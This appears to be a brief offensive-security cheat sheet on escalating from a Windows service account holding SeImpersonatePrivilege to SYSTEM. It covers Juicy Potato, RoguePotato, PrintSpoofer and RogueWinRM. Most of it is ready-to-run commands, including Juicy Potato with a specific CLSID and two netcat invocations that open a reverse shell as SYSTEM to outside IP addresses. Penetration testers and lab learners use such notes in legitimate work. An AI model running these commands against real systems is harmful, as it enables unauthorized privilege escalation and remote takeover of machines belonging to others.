SeImpersonatePrivilege
If you have this permission you are most likely a service account and you will %99 end up as NT Authority/System
If the operating system version is <= windows server 2016 use Juicy Potato else use PrintSpoofer
Juicy Potato
Pick one CLSID from here according to your system
Download the Juicy Potato binary from here
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}RoguePotato
I have never played with this one but should work in most of the cases
PrintSpoofer
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"RogueWinRM
.\RogueWinRM.exe -p C:\windows\system32\cmd.exe
.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"Last updated